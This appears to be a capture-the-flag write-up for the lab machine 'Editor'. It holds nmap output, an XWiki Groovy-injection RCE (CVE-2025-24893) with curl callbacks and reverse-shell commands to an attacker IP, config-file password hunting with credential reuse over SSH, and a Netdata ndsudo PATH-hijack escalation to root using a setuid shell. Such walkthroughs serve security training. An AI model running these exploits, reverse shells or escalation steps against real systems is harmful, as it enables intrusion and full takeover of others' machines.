Editor
Recon
# Nmap 7.93 scan initiated Mon Oct 20 20:48:57 2025 as: nmap -sVC -oA initial_scan -p22,80,8080 10.10.11.80
# Nmap scan report for 10.10.11.80
# Host is up (0.032s latency).
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey:
# | 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
# |_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
# 80/tcp open http nginx 1.18.0 (Ubuntu)
# |_http-server-header: nginx/1.18.0 (Ubuntu)
# |_http-title: Did not follow redirect to http://editor.htb/
# 8080/tcp open http Jetty 10.0.20
# | http-methods:
# |_ Potentially risky methods: PROPFIND LOCK UNLOCK
# |_http-server-header: Jetty(10.0.20)
# | http-webdav-scan:
# | WebDAV type: Unknown
# | Server Type: Jetty(10.0.20)
# |_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
# | http-title: XWiki - Main - Intro
# |_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
# | http-cookie-flags:
# | /:
# | JSESSIONID:
# |_ httponly flag not set
# |_http-open-proxy: Proxy might be redirecting requests
# | http-robots.txt: 50 disallowed entries (15 shown)
# | /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
# | /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
# | /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
# | /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
# | /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
# |_/xwiki/bin/undelete/
# Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Oct 20 20:49:06 2025 -- 1 IP address (1 host up) scanned in 8.32 seconds
User
After looking trough tcp/80 we see that this company provides code IDE, it seems to be developed with some Python (e.g. tkinter).
Looking trough the site we find a link to their wiki, which redirects us to tcp/8080, though we need to add wiki.editor.htb to our /etc/hosts file.
Now we have access to a XWiki website that explains some basics about their IDE.
If we look at the bottom we find the version: XWiki Debian 15.10.8.
Looking trough CVE Details we find CVE-2025-24893, an unauthenticated RCE witin the SolrSearch feature (fixed in version 15.10.11).
They provide a PoC inline but the special characters are a bit hard to handle within the browser or via Burp, It's very interesting, essentially is uses the search feature, that is vulnerable to Groovy injection (Groovy is based on Java) then we can use system commands to perform RCE. While I dont' really understand why it's necessary, we require the server to reply as a RSS feed using ?media=rss.
let's try to find a script PoC instead, searching GitHub we find this repo, let's test it first:
python3 POC-CVE-2025-24893.py -t http://wiki.editor.htb/ -c 'curl -s http://10.10.14.181/test'
# [*] Attacking http://wiki.editor.htb/
# [*] Injecting the payload:
# http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22curl%20-s%20http%3A//10.10.14.181/test%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
# [*] Command executed
#
# ~Happy Hacking
python3 -m http.server 80
# Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
# 10.10.11.80 - - [21/Oct/2025 21:46:27] code 404, message File not found
# 10.10.11.80 - - [21/Oct/2025 21:46:27] "GET /test HTTP/1.1" 404 -
# 10.10.11.80 - - [21/Oct/2025 21:46:27] code 404, message File not found
# 10.10.11.80 - - [21/Oct/2025 21:46:27] "GET /test HTTP/1.1" 404 -
Great let's try to get a reverse shell now:
nc -lnvp 443
python3 POC-CVE-2025-24893.py -t http://wiki.editor.htb/ -c 'sh -i >& /dev/tcp/10.10.14.181/443 0>&1'
This doesn't work… I then tried to do some exfiltration of data instead, trying to pass ls trough TCP or even HTTP using curl but nothing works, this is weird, it is a Linux machine but the commands don't seem to work, I also tried directly running a Groovy reverse shell via Burp using the method used in the PoC but no luck.
After thinking a bit and looking at other options, I tried the busybox revshell:
python3 POC-CVE-2025-24893.py -t http://wiki.editor.htb/ -c 'busybox nc 10.10.14.181 443 -e sh'
# [*] Attacking http://wiki.editor.htb/
# [*] Injecting the payload:
# http://wiki.editor.htb/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.181%20443%20-e%20sh%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
# [*] Command executed
#
# ~Happy Hacking
nc -lnvp 443
# Ncat: Connection from 10.10.11.80.
# Ncat: Connection from 10.10.11.80:47270.
whoami
# xwiki
id
# uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
uname -a
# Linux editor 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 GNU/Linux
cat /etc/os-release
# PRETTY_NAME="Ubuntu 22.04.5 LTS"
busybox --help
# BusyBox v1.30.1
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# xwiki:x:997:997:XWiki:/var/lib/xwiki:/usr/sbin/nologin
# oliver:x:1000:1000:,,,:/home/oliver:/bin/bash
ls /home/oliver
# Permission denied
pwd
# /var/lib/xwiki
ls
# data tmp
ls -l data
# drwxr-xr-x 4 xwiki xwiki 4096 Jun 13 17:09 cache
# -rw-r--r-- 1 xwiki xwiki 450 Jun 13 17:10 configuration.properties
# drwxr-xr-x 4 xwiki xwiki 4096 Jun 13 17:12 extension
# drwxr-xr-x 3 xwiki xwiki 4096 Jun 13 17:09 jobs
# drwxr-xr-x 2 xwiki xwiki 4096 Jun 13 17:08 logs
# drwxr-xr-x 2 xwiki xwiki 4096 Jun 13 17:09 observation
# drwxr-xr-x 4 xwiki xwiki 4096 Jun 13 17:13 store
cat data/configuration.properties
# xwiki.authentication.validationKey = \uBF48\u0EE2\u03FE\u4B0F\u3C8E\u35DA\uEEB8\u4013\u1E90\uF9A7\u4040\u28EA\uD217\u288BF\u6AF7\u377E\u295C\uC98D\u17FB5\uD3D4\u967F\uB8DE\u955B\uD54B\uEE55\u890D\uAFFC\u993B\u1C49\u9B87
# xwiki.authentication.encryptionKey = \uC327\u7B18\u1FFE\u913D\uEDBD\u6C85\uE778\uD7C6\u91D0\uA56F\uE1CB\u014B\uD03E\u9E5D\uED9D\uB44A\u3A0C\u1C76\uF0D6\u8289\u645F\u6EB8\u00EB\u99DA\u589E\uE3CE\uC24A\u9486\u5EAB\u2E85\uCCEB\uAF4D
I saw /usr/lib/xwiki somewhere I dont remember:
cd /usr/lib/xwiki
ls
# META-INF redirect resources skins templates WEB-INF
cat WEB-INF
grep -r "password"
# hibernate.cfg.xml: <property name="hibernate.connection.password">theEd1t0rTeam99</property>
# hibernate.cfg.xml: <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml: <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml: <property name="hibernate.connection.password"></property>
# hibernate.cfg.xml: <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml: <property name="hibernate.connection.password">xwiki</property>
# hibernate.cfg.xml: <property name="hibernate.connection.password"></property>
Great looking at the file we find:
<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
xwiki:theEd1t0rTeam99
Let's try that password on oliver:
ssh oliver@editor.htb
# Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
ls
# user.txt
Root
sudo -l
# [sudo] password for oliver:
# Sorry, user oliver may not run sudo on editor.
cd /opt
ls
# containerd netdata
cd netdata
ls -la
# drwxr-xr-x 8 root root 4096 Jul 8 08:34 .
# drwxr-xr-x 4 root root 4096 Jul 8 08:34 ..
# drwxr-xr-x 3 root root 4096 Jul 8 08:34 bin
# drwxr-xr-x 3 root root 4096 Jul 8 08:34 etc
# lrwxrwxrwx 1 root root 11 Jun 15 16:33 netdata-configs -> etc/netdata
# lrwxrwxrwx 1 root root 15 Jun 15 16:33 netdata-dbs -> var/lib/netdata
# lrwxrwxrwx 1 root root 15 Jun 15 16:33 netdata-logs -> var/log/netdata
# lrwxrwxrwx 1 root root 17 Jun 15 16:33 netdata-metrics -> var/cache/netdata
# lrwxrwxrwx 1 root root 19 Jun 15 16:33 netdata-plugins -> usr/libexec/netdata
# lrwxrwxrwx 1 root root 21 Jun 15 16:33 netdata-web-files -> usr/share/netdata/web
# lrwxrwxrwx 1 root root 3 Jun 15 16:33 sbin -> bin
# drwxr-xr-x 6 root root 4096 Jul 8 08:34 share
# drwxr-xr-x 2 root root 4096 Jul 8 08:34 system
# drwxr-xr-x 5 root root 4096 Jul 8 08:34 usr
# drwxr-xr-x 6 netdata netdata 4096 Jul 8 08:34 var
Online I found out that netdata is a monitoring tool, looking at the open ports we see there is a service running on 8079:
ss -tulnp
# tcp LISTEN 0 128 [::]:22 [::]:*
# tcp LISTEN 0 511 [::]:80 [::]:*
# tcp LISTEN 0 50 [::ffff:127.0.0.1]:8079 *:* users:(("java",pid=986,fd=41))
# tcp LISTEN 0 50 *:8080 *:* users:(("java",pid=986,fd=43))
Let's try to look trough the bin/ and sbin/ directories first:
./bin/netdata -V
# netdata v1.45.2
Looking for vulnerabilities I found CVE-2024-32019, allows running commands as root via the ndsudo utility.
Let's find it:
find . -type f -name ndsudo
# ./usr/libexec/netdata/plugins.d/ndsudo
ls -la ./usr/libexec/netdata/plugins.d/ndsudo
# -rwsr-x--- 1 root netdata 200576 Apr 1 2024 ./usr/libexec/netdata/plugins.d/ndsudo
./usr/libexec/netdata/plugins.d/ndsudo -h
#
# ndsudo
#
# (C) Netdata Inc.
#
# A helper to allow Netdata run privileged commands.
#
# --test
# print the generated command that will be run, without running it.
#
# --help
# print this message.
#
# The following commands are supported:
#
# - Command : nvme-list
# Executables: nvme
# Parameters : list --output-format=json
#
# - Command : nvme-smart-log
# Executables: nvme
# Parameters : smart-log --output-format=json
#
# - Command : megacli-disk-info
# Executables: megacli MegaCli
# Parameters : -LDPDInfo -aAll -NoLog
#
# - Command : megacli-battery-info
# Executables: megacli MegaCli
# Parameters : -AdpBbuCmd -aAll -NoLog
#
# - Command : arcconf-ld-info
# Executables: arcconf
# Parameters : GETCONFIG 1 LD
#
# - Command : arcconf-pd-info
# Executables: arcconf
# Parameters : GETCONFIG 1 PD
#
# The program searches for executables in the system path.
#
# Variables given as are expected on the command line as:
# --variable VALUE
#
# VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
The program searches for executables in the system path.
Ok so essentially se can give it a command and it will run it as root, and those preset commands locate their binary from the $PATH:
./usr/libexec/netdata/plugins.d/ndsudo nvme-list
# nvme : not available in PATH.
echo $PATH
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
There is no nvme binary, which makes this easier, as the app trusts our own PATH. Let's add a custom path to some hidden tmp directory:
cd /var/tmp
mkdir systemd-private-dcb5adc5ba2dc532dca332960fef89a9-xwiki.service-000fe2
printf '#!/bin/bash\n/bin/bash' > nvme
chmod +x nvme
cd /opt/netdata
./usr/libexec/netdata/plugins.d/ndsudo nvme-list
whoami
# oliver
exit
Mmh it did create a new shell, though that was not a privesc, let's try to make a shell that forces the UID/GID to 0:
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
gcc -o foo foo.c
python3 -m http.server 80
wget http://<myIP>/foo -O /var/tmp/systemd-private-dcb5adc5ba2dc532dca332960fef89a9-xwiki.service-000fe2/nvme
./usr/libexec/netdata/plugins.d/ndsudo nvme-list
whoami
# root
cd /root
ls
# root.txt scripts snap